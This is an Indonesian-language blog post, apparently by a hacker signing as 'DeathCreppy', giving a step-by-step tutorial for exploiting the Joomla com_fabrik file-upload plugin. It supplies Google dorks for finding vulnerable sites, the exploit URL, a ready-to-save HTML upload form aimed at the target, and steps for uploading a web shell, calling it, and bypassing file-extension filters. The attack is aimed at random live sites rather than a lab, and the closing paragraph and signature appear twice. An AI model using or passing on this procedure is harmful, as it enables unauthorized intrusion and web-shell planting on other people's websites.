~
Dork : inurl:index.php?option=com_fabrik
inurl:index.php?option=com_fabrik site:com
Exploit : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Vulnerability : {"filepath":null,"uri":null} CSRF = <form method="POST" action="http://target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
enctype="multipart/form-data">
<input type="file" name="file" /><button>Upload</button>
</form>
Your Access Shell: /patch/file.php
1. Masukkan Dorknya Ke Google >,< Tinggal Carii web yang mau di Eksekusi ;v >,<
Jika Sudah Dapat Targetnya Eksekusinya Tinggal Lanjut Tahap Selanjutnya >,< btw saya Pkek Web Target :v >,< Biar Mempermudah Ilmu Yang Di Cerna :v
Disini Kita Tinggal Tambahkan Exploitnya Di Belakang Website Target Yang Kita Mau Eksekusi :v www.site.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Jika Sudah Tampilan Seperti Di Atas :V Skalian Tanda Vulnerability Pada Websitenya :v Kalau Sudah Tinggal Masukkan URL nya Ke CSRF Nya Sadjah Buat Upload Shell :v
Ambil Dan Copy CSRF Di Atas Simpan Dengan Format .html Lalu Masukkan URL Web Target Yang Sudah Di Kasih Exploit Ke Dalam CSRF tadi Kalau Sudah Akan Muncul Nanti Tempat Upload Shellnya
Nahhh Saya Kali ini Upload HTML aja karna ngag bsa Upload PHP :v >,< hanya buat tutor aja :D kalau Sudah Di Upload Akan Muncul Seperti ini Jadi Tinggal Manggil Access File Saja
NB : Ingat Ngag Semua Website Bisa Di Upload Shell Kadang Ada Yang Hanya Menerima .jpg .txt .html .htm .doc dll ;) Kalau Mau Maksa Bisa Upload Shell Pande"lahh Bypass Ext nya :v
Cara Panggil Access File nya
www.site.com/filename.html / php Tergantung siihh Uploadnya apaan :v
Gimana ? Susah ? Mudah Kok :D Yang Susah Ngelakuinnya :D Ngag ada Niat :D Cba Anak Niat Pasti Semua Akan Mudah :) ...
NB : Jangan Lupa Comment Kalau Kurang Tau , Like , Share yahh, Ilmu Jangan Di Pendemin Kalau Bisa Bermanfaat Buat Orang Lain :) Kenapa Tidak Di Keluarkan :v Jangan Salah Gunakan Yahh ^-^
Salam Hangat : DeathCreppy From Jones Unlimited Edition
Gimana ? Susah ? Mudah Kok :D Yang Susah Ngelakuinnya :D Ngag ada Niat :D Cba Anak Niat Pasti Semua Akan Mudah :) ...
NB : Jangan Lupa Comment Kalau Kurang Tau , Like , Share yahh, Ilmu Jangan Di Pendemin Kalau Bisa Bermanfaat Buat Orang Lain :) Kenapa Tidak Di Keluarkan :v Jangan Salah Gunakan Yahh ^-^
Salam Hangat : DeathCreppy From Jones Unlimited Edition
Tidak ada komentar:
Posting Komentar